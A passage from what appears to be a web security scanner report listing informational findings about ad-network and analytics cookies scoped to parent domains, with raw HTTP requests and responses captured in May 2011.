Location: http://f2nthevine.112.2o7.net/b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343?AQB=1&pccr=true&&ndh=1&t=9/4/2011%209%3A1%3A25%201%20300&ce=ISO-8859-1&cdp=3&pageName=thevine%3Anews%3Amusic%20dump%20-%20sufjan%20stevens%20selling%20beastie%20boys%20headphones%20to%20johnny%20cash&g=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&cc=AUD&ch=index&events=event1&c1=index&v1=index&c2=index%3Anews&v2=index%3Anews&c6=article&v6=article&c7=Music%20Dump%20-%20Sufjan%20Stevens%20Selling%20Beastie%20Boys%20Headphones%20To%20Johnny%20Cash&v7=Music%20Dump%20-%20Sufjan%20Stevens%20Selling%20Beastie%20Boys%20Headphones%20To%20Johnny%20Cash&c8=TimByron&v8=TimByron&c14=New&v14=New&c21=thevine%3Anews%3Amusic%20dump%20-%20sufjan%20stevens%20selling%20beastie%20boys%20headphones%20to%20johnny%20cash&c28=No%20cookie%20data&v28=No%20cookie%20data&c29=No%20cookie%20data&v29=No%20cookie%20data&c30=No%20cookie%20data&v30=No%20cookie%20data&x=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 14:06:56 GMT
Last-Modified: Tue, 10 May 2011 14:06:56 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www70
Content-Length: 0
Content-Type: text/plain


9.39. http://floridatoday.us.intellitxt.com/intellitxt/front.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://floridatoday.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /intellitxt/front.asp?ipid=13767 HTTP/1.1
Host: floridatoday.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7NwEAAAEvvajK5QA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwEAAAEv1Q9PsQA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 14:00:41 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7OwEAAAEv1Q9PsQA-; Domain=.intellitxt.com; Expires=Fri, 08-Jul-2011 14:00:41 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:41 GMT
Age: 0
Connection: keep-alive
Content-Length: 11706

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...

9.40. http://gpaper114.112.2o7.net/b/ss/gpaper114,gntbcstglobal/1/H.21/s81096398781519

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gpaper114.112.2o7.net
Path:   /b/ss/gpaper114,gntbcstglobal/1/H.21/s81096398781519

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/gpaper114,gntbcstglobal/1/H.21/s81096398781519?AQB=1&pccr=true&&ndh=1&t=9/4/2011%208%3A59%3A45%201%20300&pageName=Highly%20publicized%20murder%20of%20Caylee%20Anthony%20rivets%2C%20enrages%28201105080108%29&g=http%3A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&cc=USD&server=SAXO-GEL&events=event3&v1=gpaper114&v5=local_news&c6=news&c7=local_news&c11=/article/20110508/NEWS01/105080319&c16=article&c17=news&c23=http%3A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&c24=floridatoday.com&c25=gpaper114&c29=1&c44=/article/20110508/NEWS01/105080319&c48=no%20segments&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: gpaper114.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|0-0|4DC7F352[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:48 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_nyhylx7B88x3D=[CS]v4|26E3F9AA051612A9-400001A680400F96|4DC7F352[CE]; Expires=Sat, 7 May 2016 13:59:48 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_jcyonx7Eyjabola=[CS]v4|26E3F9AA051612A9-400001A680400F98|4DC7F352[CE]; Expires=Sat, 7 May 2016 13:59:48 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 13:59:48 GMT
Last-Modified: Tue, 10 May 2011 13:59:48 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DC7F354-253C-40A45FE4"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www652
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

9.41. http://i.w55c.net/ping_match.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /ping_match.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping_match.gif?rurl=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D535039%26ev%3D_wfivefivec_ HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC

Response

HTTP/1.1 302 Found
Set-Cookie: wfivefivec=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC;Path=/;Domain=.w55c.net;Expires=Wed, 08-May-13 14:00:04 GMT
Cache-Control: private
X-Version: DataXu Pixel Tracker v3
Location: http://bh.contextweb.com/bh/rtset?do=add&pid=535039&ev=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC
Server: Jetty(6.1.22)
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 0


9.42. http://ib.adnxs.com/ab

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ab?enc=zszMzMzM_D_5U-Olm8T4PwAAAMDMzPw_-VPjpZvE-D_NzMzMzMz8P33ocmbms6M7SsYda6b2ziVw88dNAAAAAHVBBgBUAwAAZAEAAAIAAABT_gQADcAAAAEAAABVU0QAVVNEACwB-gC5H9kEPw8BAgUCAAQAAAAAcC4a9AAAAAA.&tt_code=4455744&udj=uf%28%27a%27%2C+10005%2C+1304949637%29%3Buf%28%27c%27%2C+47078%2C+1304949637%29%3Buf%28%27r%27%2C+327251%2C+1304949637%29%3Bppv%289163%2C+%274297476271584241789%27%2C+1304949637%2C+1305122437%2C+47078%2C+49165%29%3B&cnd=!QxexlQjm7wIQ0_wTGAAgjYADKNkJMQAAAMDMzPw_QhMIABAAGAAgASj-__________8BSABQAFi5P2AAaOQC&referrer=http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&custom_macro=ADV_CODE%5E17572%5ECP_CODE%5EH26G%5ECP_ID%5E47078%5ESEG_CODES%5EH26G-8&pp=1.30 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:00:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:24 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:24 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; path=/; expires=Sun, 07-Aug-2011 14:00:24 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 14:00:24 GMT
Content-Length: 1491

document.write('<a href="http://ib.adnxs.com/click/DPqCvqAv-D_NzMzMzMz0PwAAAMDMzPw_-VPjpZvE-D_NzMzMzMz8P33ocmbms6M7SsYda6b2ziVw88dNAAAAAHVBBgBUAwAAZAEAAAIAAABT_gQADcAAAAEAAABVU0QAVVNEACwB-gC5H9kEPw8BA
...[SNIP]...

9.43. http://ib.adnxs.com/getuid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http://r.turn.com/r/bd?ddc=1&pid=54&cver=1&uid=$UID HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:00:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:12 GMT; domain=.adnxs.com; HttpOnly
Location: http://r.turn.com/r/bd?ddc=1&pid=54&cver=1&uid=2724386019227846218
Date: Mon, 09 May 2011 14:00:12 GMT
Content-Length: 0


9.44. http://ib.adnxs.com/if

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /if?enc=XHLcKR2syT9cctwpHazJPwAAACAEVvI_XHLcKR2syT9cctwpHazJP0YIgIiop3FfSsYda6b2ziWz88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAmA8AAgMCAAUAAAAAOCNlQgAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949676%29%3Buf%28%27r%27%2C+184995%2C+1304949676%29%3B&cnd=!Wx_b0wjC6AIQo6ULGAAg8dUBKAAxXXLcKR2syT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-ELG5AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; sess=1; uuid2=2724386019227846218; icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; path=/; expires=Sun, 07-Aug-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 14:01:25 GMT
Content-Length: 530

<script language="JavaScript" src="http://mf.sitescout.com/tag.jsp?pid=0C66F16&w=728&h=90&rnd=1304949683&cm=http://ib.adnxs.com/click/XHLcKR2syT9cctwpHazJPwAAACAEVvI_XHLcKR2syT9cctwpHazJP0YIgIiop3FfSs
...[SNIP]...

9.45. http://ib.adnxs.com/mapuid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /mapuid

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=311&user=11f8f328940989e&seg_code=cm.ent_l,cm.music_h,ti.aal,bz.25,dx.16,dx.23,dx.17,rt.truecredit2,qc.ae,qc.ac,idgt.careers_l&ord=1304949578 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-sEBEAoYCiAKKAowg_iG7gQQg_iG7gQYCQ..; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#-r-98m2jrr-%SN'CJQE2F!)VKr0:$5r$<o/e@)WesS%k+n*I('YxYT*<N@6F+c(io$N-%L1@9'b[5(:jB-9V[OUYy9.R5e[ytcpQ`bMH@TW6X$3_sCR$6Xedk-G'TDF.mC`)B_N$6LQR^Q1gg.MkA)P$tfA)DWsB'hbJ<Zo?BY+A8^^2)oHZ5mIqhtj<v4iwpkyYITX547eLID>>z*PI7v'je[t@sbTLvZL[5/^@u)U'+YE]A*I/WjMFL7TH)6(3+$CLIE.`Q02p!/Bh8LJdJMOI#teJcaJ2gAxMkoDkRfC>:upDX3r@Xk!*_O@<)?o7FEG#?s@>3rsZ:NP+SZwInEb8?uR<<.1bW>zC'DHc(RjR_5cV/>hV4<.Ep_Brg%LYIKnl%jfU4H4E7-mJZW+LULZ/rSrz3JC#MNpp09cPRI)3/W$VKQg4AB[7:`laDI'0.])0*DP]MTFF+TEc'nRbjb[T9R5j$WfUnk:l:dTEaTSKXEV/XvsO=)MPZ#H-A8'm1SbZ-hlwo/uIEE1WKi>%cMg!FYc3gk*_!.KhjIbfv>n6icJz]`pNnloA:BN7K@E`FgYF*-qn0v`vWZ1n

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ(]G)_`x=M7Yqu/-]C*<OrJiXuLYTO`g0UkVr@%.RF2bQZ@j#4^3C.?o<b/8<L'U16EY8/^((w(nAV$<1`/('a^!sSG$UxhO.IO%YAI:rj?.Xae`ue`kZAlt:BZUi'2@YA@MPB>J8D.Zf(Y>:H$>Lb@C.JG2!$s>T6eS6]+Yz4(E3*crWg(/N]#.IASyBEK$4mNdV8`wP4Zf7SJ_5J?`oPNf+[aM*eil^_*.IeAI)9Dn!->2knC56GW[oggLmEZ_[lvZ_cz.ae-?yi.#gk0qd(%ZwsfuTbvd+M<X2/_RcUaefE=AkL5zD[%aB7w!)mWC[3BIbZkKzh5D#5oPpwcj6!3O:F-g%UQUTMq8Q^kMwpL>b1'r6eZHjiY`Lf!rG3XusDrRPXBZ!lcH[[(<hO%VT<@[_(VO4iF>IwkPWeno>EIPasogQE9accK4xDD2M#lZT0N6k4oI8bdT)SH.T2E2vx*W*YtkpGDme#!PwhxFm/J_@[x!07wLVxCV0.t9lG=*w!X=ar9V%`BQp1.kL`Y6G+(@22xX(k[k0D%a5tzz_b44.VGe1$-J=B.djI?-8Xc=5KWeZZh^p0Y*xSM$BxcJt5_BwmEM%y<lxnTzkVwz^+^n8^ky; path=/; expires=Sun, 07-Aug-2011 13:59:40 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Mon, 09 May 2011 13:59:40 GMT

GIF89a.............!.......,........@..L..;

9.46. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

